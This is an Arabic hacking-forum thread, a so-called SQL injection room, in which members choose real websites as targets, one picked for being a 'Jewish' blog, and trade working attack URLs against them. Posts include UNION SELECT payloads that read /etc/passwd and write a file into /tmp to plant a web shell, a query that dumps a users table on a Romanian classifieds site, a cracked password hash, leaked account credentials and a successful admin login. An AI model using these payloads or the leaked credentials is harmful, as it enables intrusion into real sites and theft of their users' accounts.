غرفة حقن قواعد البيانات {غرفة Sql }

[Master vbspiders]

Syst3m-32
هوما يحبو المخقون المنتهي
ههههههههههههههههههههه
يحبون قسم الإنجازات
خخخخخخخخخخخخخخخخخخخخ
مسااااااااااااااااااااااكين
أنا راح أحط الهدف
موقع يهودي إصدار قاعدته 4

[align=center]ههههههه
معاك حق فعلا هما يحبون الشي يجيهم جاهز وكامل...
ضع الهدف وتوكل وراح نترك الهدف لبكرا ممكن احد الاعضاء يشارك معانا ويحقنو
تحياتي^_^


[/align]

 

[darkman.dz]

هذا هو الهدف الجديد
blog يهودي
مع العلم أنني أريد خطوات الإختراق كل أمر قمت به و العقبات التي صادفتك

http://blog.soundcat.org/post.php?id=12

 

[darkman.dz]

Master vbspiders
صدقني ماراح يحقنو ولا واحد ولو تتركه أسبوع كامل

 

[Master vbspiders]

Master vbspiders
صدقني ماراح يحقنو ولا واحد ولو تتركه أسبوع كامل

[align=center]ههههه فعلا والله وخصوصا هذا الموقع
لانو فيه تخمين
ننتظر لبكرا والله كريم
تحياتي[/align]

 

[marrak]

اليكم هذا الموقع
http://www.slatina-online.ro/adauga_anunt.php?necompletat=true&categorie=5

 

[darkman.dz]

جاري أخ marrak

 

[darkman.dz]

اليكم هذا الموقع
http://www.slatina-online.ro/adauga_anunt.php?necompletat=true&categorie=5

الموقع ليس مصاب أخي
يرجى التأكد
و الله أعلم

 

[d4rK-h4ck3r]

شوف الموقع بثغرة into outfile تقدر ترفع شيل لازم مسار مصرح
http://www.talkeetnachamber.org/new...,3,load_file('/etc/passwd'),5,6,7,8,9,10,11--
و يتيح الطباعة قمت بتكوين ملف في مجلد tmp

http://www.talkeetnachamber.org/news.php?id=158+AND+1=2+UNION+SELECT+1,2,3,'d4rk-h4ck3r',5,6,7,8,9,10,11+into+outfile"/tmp/d4rk.txt"

http://www.talkeetnachamber.org/new...,load_file('/tmp/d4rk.txt'),5,6,7,8,9,10,11--

لول تمت طباعة اسمي يعني يتيح الطباعة فقط ما زال معرفة مسارنا بالسيرفر اذا وجدناه اضمنلك شل مرفوع

 

[darkman.dz]

d4rK-h4ck3r
هههههههههههههههههههههه
مازال ماوصلتش لهاذ الدرجة من الإحتراف أخي الكريم
ههههههههههههههههههههههههههههههههههههههههههههههه

 

[d4rK-h4ck3r]

اخي هذه الفائدة من المشاركات مزيد التعلم و ان شاء الله تتقن مثل هذا النوع من الثغرات كما ان الاخوة من الجزائر سريعوا التعلم و هم النخبة في الاختراق اولهم الاسطورة his0k4 و ان شاء الله تتوصل لاختراقه
العبرة في المحاولة

 

[darkman.dz]

تعم أخي العزيز
أول مرة أتعلم السيكول في 2 ساعات إخترفت موقع
ههههههههههههههههههههههه
اليوم فقط رجعت النت قوية
أرجو أن تتواصل هكذا لكي أعود إلى التعلم من جديد

 

[d4rK-h4ck3r]

ان شاء الله لما احسن و انا سارفعلك شرح عامله لاستغلال هذا النوع من الثغرات لكن اصبر علي شوي lol

 

[m0h@med]

اليكم هذا الموقع
http://www.slatina-online.ro/adauga_anunt.php?necompletat=true&categorie=5

Hi my brother marrak
there exist some account you can so use it
usernameassword
florintele:356746
giba:123
office:456
keepto.ro:12345

.
.
.

regards

 

[m0h@med]

تم الدعس

الموقع ليس مصاب أخي
يرجى التأكد
و الله أعلم

السلام عليكم
حياك الله أخي الكريم
الموقع مصاب و يكفي تغيير السكريبت.
الاستغلال الكامل

http://www.slatina-online.ro/detalii_anunt.php?id_anunt=267&id_categ=3&id_subcateg=-22%20union%20select%201,2,concat_ws(0x3a,id,user,parola)+from+utilizatori--

هذا أول عدس لي في المنتدى ......تحياتي

 

[Master vbspiders]

[align=center]ممممم
بالنسبة للموقع الاول : http://blog.soundcat.org/post.php?id=12
ما قدرت اخمن الجداول للاسف...
واما الموقع الثاني تبع الاخ marrak فبالبداية كان تفكيري مثل الاخ ooooo_darkman_ooooo
يعني ما في خطا اصلا والموقع مش مصاب لكن بعدها فكرت اجرب بسكربت ثاني وعلى نفس الموقع
ونجحت والاخ m0h@med وضع الاستغلال قبلي وهذا هو :

http://www.slatina-online.ro/detalii_anunt.php?id_anunt=267&id_categ=3&id_subcateg=-22%20union%20select%201,2,concat_ws(0x3a,id,user,parola)+from+utilizatori--

وتم فك الهاش :c6efc361da2fbccf3f88936e54624bb8
والباس هو : 356746
ولوحة الدخول : http://www.slatina-online.ro/
هناك تسجيل دخول واضح بالصفحة الرئسية
تم الدخول بنجاح
بارك الله فيكم جميعا...
عمل منظم ورائع
تحياتي

[/align]

 

[Master vbspiders]

[align=center]تم تقييم كل من الاخ :
ooooo_darkman_ooooo
&
m0h@med
++بارك الله فيكم++
++تحياتي++

[/align]

 

[darkman.dz]

شكرا أخي d4rK-h4ck3r

===================

 

[darkman.dz]

m0h@med
==========
ههههههههههههههههههههههه
أخي الكريم أنا لم أبحث في سكربتات الموقع أنا إعتقدت أنو الرابط اللي حطو الأخ الكريم النتغير اللي فيه هو المصاب
===========================
شكرا على التنبيه +نتمنى مايكون الدعس الأخير + ممكن حد يشرحلى الأمر concat_ws(0x3a,id,user,parola)
وشكرا
منتظركم

 

[darkman.dz]

بارك الله فيك أنت أخي Master vbspiders
على الموصوع الجميل
+ بالنسبة للموقع (البلوق اليهودي ) نفس الشيئ معي
أرجو من الإدارة تقييم الموضضوع

 

[Master vbspiders]

[align=center]الهدف الجديد : http://www.marmoon.com/pregames.php?id=383
بدنا سرعة في الحقن هجوم يا ابطال
تحياتي


[/align]